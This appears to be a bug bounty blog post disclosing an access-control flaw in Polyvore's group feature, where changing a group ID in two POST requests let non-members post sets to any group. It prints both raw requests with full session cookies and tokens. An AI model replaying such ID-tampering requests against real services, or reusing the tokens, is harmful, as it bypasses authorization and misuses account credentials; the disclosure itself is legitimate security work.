Polyvore is a community-powered social commerce website headquartered in Mountain View, California.The company's virtual mood board function allows community members to add products into a shared product index, and use them to create image collages called "Sets". They can also browse other users' sets for inspiration, share sets with friends and interact with people through comments and likes.Due to the visual nature of the tool Polyvore is mostly used to build sets in the fields of home decoration, beauty, and fashion. Online retailers, too, can upload their product images to Polyvore and link back to their product pages or use Polyvore to encourage users to showcase their products through such activities as board creation competitions. [SOURCE: Wikipedia]
Description: In Polyvore, a user can create set, share set in groups, post sets in their blogs etc.If you don't know what set is then again read the line 'The company's virtual mood board function allows community members to add products into a shared product index, and use them to create image collages called "Sets" ' As mentioned earlier a user can add sets in a group.In order to add sets in a group, a user must have to join the group.Only those who a member of the group can add sets to the group.There was an issue where those who are not a member of Polyvore Group also able to add sets in a group.
Things to be noted: The same issue affected different parameter.So, they rewarded two times.
Steps to reproduce:
One can add set in Polyvore Group in two way.By Clicking on "Add Set"
OPTION 1: One can add set in Polyvore Group in two way.By Clicking on "Add Set"
OPTION 2: From the Publish Set option.
I was able to Post Set on any group from these two endpoints.
When someone adds set in a group using the OPTION 1 the request was similar like below:
POST /cgi/group.submit HTTP/1.1
Host: www.polyvore.com
Connection: close
Content-Length: 229
Cache-Control: max-age=0
Origin: https://www.polyvore.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.39 Safari/537.36
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Referer: https://www.polyvore.com/all_season_group/group.show?id=73536&tab=members
Accept-Language: en-US,en;q=0.8
Cookie: v=2144240055; rxx=1fy8emu01od.tn5plza&v=1; __gads=ID=1aa3d6be54ccc6e7:T=1502914211:S=ALNI_MbER1uBrTk8BQ0m0bu84W9dJY32ZQ; l=sig&3a2c4110e811cce31771124fa08ab10e34a7f6f066ef1997bdf3f15c5c8f96bf&n&asadx&lat&1502914280&lwt&0&id&23768120&t&1502914280; fbm_2358043356=base_domain=.polyvore.com; as={"cid":"226775741","basedon_tid":null}; fbsr_2358043356=Ewm75X53AReNFEErNGah8YGsJ6H2-fXbw6cr3e4-el4.eyJhbGdvcml0aG0iOiJITUFDLVNIQTI1NiIsImNvZGUiOiJBUUQ0cmIza3lNMVJCNElIdGdGOUNHbC1EclBzeGh0ZWVOR2ZJc1E0TE1VSEV1a0E0VHNlLWl2a1BFMXpDc29pUHRfb29LNThvR3dOR2NpaWZkbEVmSlpDcnhpNGNxclBadUVQX1JTUDVVdDRyUXppd2xWQnNmOXZUMXcyQ25EdS1oUFRzWE56UHZpcVZDRXU5eXpvX21YRGpPZ1NZUUNqQ0xrLWpJQmN3cWllNnJsQk5YZWZweThrOTZVb0FodG1TYUJzNEVaUkV3UjJTRHZhNXg3WU5LQVdDWjJkMmdmMFJyQVhKRVVJX005WmY4ejJxU0JuTHJUWEpidHJMZ3A3MUxQdjg1VnBzTTVfV3NocEUxZDVGYlRvQnNYeFBnQkJ1VjNxcW1ua0xvNGFSX0NVaEo0N3YtY213TTFrZkJlRllmQTBqX1paZlBhNHFNZHFsOW1RVkMySSIsImlzc3VlZF9hdCI6MTUwMjkxNjY3MSwidXNlcl9pZCI6IjE5ODA0OTQxODU1MzA0OTkifQ; _gat_UA-1750090-4=1; st=bid|2144240055,client_type|desktop,discussions_enabled|1,exp_ga_test1|20c,exp_ga_test2|on,exp_polydeal|on,outmode|HTML,session_referral_source|none,sid|4,vid|14459003952290544628; se=c&1502914194&v&14459003952290544628&s&4&t&1502916696; _ga=GA1.2.8491215.1502914239; _gid=GA1.2.896406160.1502914239
request={"id":"201799","spec_uuid":"PmG1K8OC5xGWfrjVZRqEYg",".xsrf":"MjM3NjgxMjAsMTUwMjkxNjY5Niw4NDhkZTRhNjNjYzUwMDk0YjljOWE5YTBmN2Y1Njk2YjhlM2EzM2RmODNlYThmNDAzNThkZDE3YzY0MWNhZjFk"}&.in=json
In the above request, 201799 is the group ID.Just by changing the group value I was able to post sets on every group(Even I'm not member of the group)
Bounty:$500
While Publishing set using OPTION 2 a user can select group to add set in the group.
The request was similar like this:
POST /cgi/set.publish HTTP/1.1
Host: www.polyvore.com
Connection: close
Content-Length: 1030
Origin: https://www.polyvore.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: /
Referer: https://www.polyvore.com/cgi/app
Accept-Language: en-US,en;q=0.8
Cookie: v=2162389121; rxx=126qceffq2t.uh697lp&v=1; __gads=ID=e1de4979d00d20b6:T=1504729111:S=ALNI_MaxNAPNvE5RhwZPMyv5mVftEtPYoA; fbm_2358043356=base_domain=.polyvore.com; l=sig&3d96e8e7e05a76399c9aec4bb5551644fdce0ec5b6593ee2a968bf18a7016272&n&mohammad-asad&lat&1504730529&lwt&0&id&23771525&t&1504730529; fbsr_2358043356=lgllZoJOWPIYlT3z7lc5JBAi3dXaZL35gBTPUSPvcnY.eyJhbGdvcml0aG0iOiJITUFDLVNIQTI1NiIsImNvZGUiOiJBUUF3YzdjRi1VTGNOc1NTTDlUeE0ta3ppS3FKMXFmUS1NQkIxMTZuc2xoVkV6U1JNaU5WY0VpWUxwNnhRaldjcS1qUWdCYXRlVlZHUzdXcGdZc3VUa2FSd05KTlQxYzdqYzR5WDZrMnFpQjFiR0h1QUdVRFc3c2EtSS1OdUVWLU9xRlpvcEdWbTZwYnlaVE9CUjFHcm1mVlg2TFk2d3JCLURvRElwWE5HWk8tcGJuV24xT0pId0RLYVdHcXhGRF8yeW1GSWJQQzVmMmRZaFByU01reThnLXk1dDY3U2tUdmVMdjNxSTF2MlV4eVhtTlExdTRJRDFfUnpxeXZ4RmV5eC01cHFwV1pnRzdTZ096NXhxSklMMjZLd3RQZnBNeDZaNDlaLVE3b1cydjVOU1hSV0ZXOWhQbEp6bG9PS2hzZEhFbW1QTG9QT05XY1BOd0FodzRWOFZ6SiIsImlzc3VlZF9hdCI6MTUwNDczMTQyMiwidXNlcl9pZCI6IjU5OTUwMzEwNzEwNDMwNiJ9; se=c&1504729100&v&11302205241084592593&s&1&t&1504731782; _ga=GA1.2.111378368.1504729106; _gid=GA1.2.925380198.1504729107; _gat_UA-1750090-4=1; e=%7B%22uuid%22%3A%22Si_txUaT5xGBbTHFWc0rKw%22%2C%22list%22%3A%5B%5B%22saveset%22%5D%5D%2C%22_lts%22%3A1504731778220%7D; st=bid%7C2162389121%2Cclient_type%7Cdesktop%2Cexp_ga_test1%7C10a%2Cexp_ga_test2%7Con%2Cexp_polydeal%7Con%2Coutmode%7CHTML%2Csession_referral_source%7Cnone%2Csid%7C1%2Cvid%7C11302205241084592593
.in=json&.out=json&request={"dirty":1,"id":"227841737","did":null,"basedon_tid":null,"title":"test","description":"nais","category":"menswear","tags":[],"groups":["201799"],"items":[{"x":144.297192642788,"y":70,"w":157.40561471442402,"h":200,"z":1,"transform":[1.0000000000000002,0,0,1.0000000000000002],"type":"image","thing_id":"218486216"},{"x":349.7121771217712,"y":77,"w":164.57564575645756,"h":200,"z":2,"transform":[1.0000000000000002,0,0,1.0000000000000002],"type":"image","thing_id":"218760305"}],"quickshare":"on","quickshare_list":"facebook","pin_type":"long_pin",".xsrf":"MjM3NzE1MjUsMTUwNDczMTc4MyxhNzQ3ZDM5YTVhMDA4YzJmZjFjY2NmNjkzY2QyNzdkYWE3M2VkZjcxZWZlZjU3NGI1YTEyMjEwZjE2NmIwMGU0"}
201799 is GROUP ID.By changing the Group ID anyone would've been able to add set in any group :)
Bounty:$400
Video POC:
It has been a pleasure to work with YAHOO!.They're very fast and responsive :) Thanks YAHOO!
Comments
Post a Comment